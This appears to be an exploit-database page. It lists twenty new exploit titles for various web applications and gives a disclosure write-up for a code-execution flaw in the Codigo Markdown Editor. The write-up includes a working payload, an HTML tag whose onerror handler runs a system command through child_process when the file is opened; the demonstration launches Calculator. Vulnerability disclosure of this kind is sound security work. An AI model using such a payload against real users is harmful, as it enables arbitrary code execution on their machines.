
20 changes to exploits/shellcodes/ghdb:
Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution
Cmaps v8.0 - SQL injection
EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)
File Thingie 2.5.7 - Remote Code Execution (RCE)
Intern Record System v1.0 - SQL Injection (Unauthenticated)
Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
Jedox 2022.4.2 - Code Execution via RPC Interfaces
Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
Online Pizza Ordering System v1.0 - Unauthenticated File Upload
pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)
Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
35 lines
No EOL
1.2 KiB
Text
# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage: https://alfonzm.github.io/codigo/
# Software Link: https://github.com/alfonzm/codigo-app
# Version: 1.0.1
# Tested on: [Mac OS 13]

Release Date:
=============
2023-05-03

Product & Service Introduction:
===============================
A Markdown editor & notes app made with Vue & Electron

Technical Details & Description:
================================

A vulnerability was discovered in Codigo markdown editor v1.0.1 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
=======================

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload:

<video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Codigo will auto-execute the Calculator application.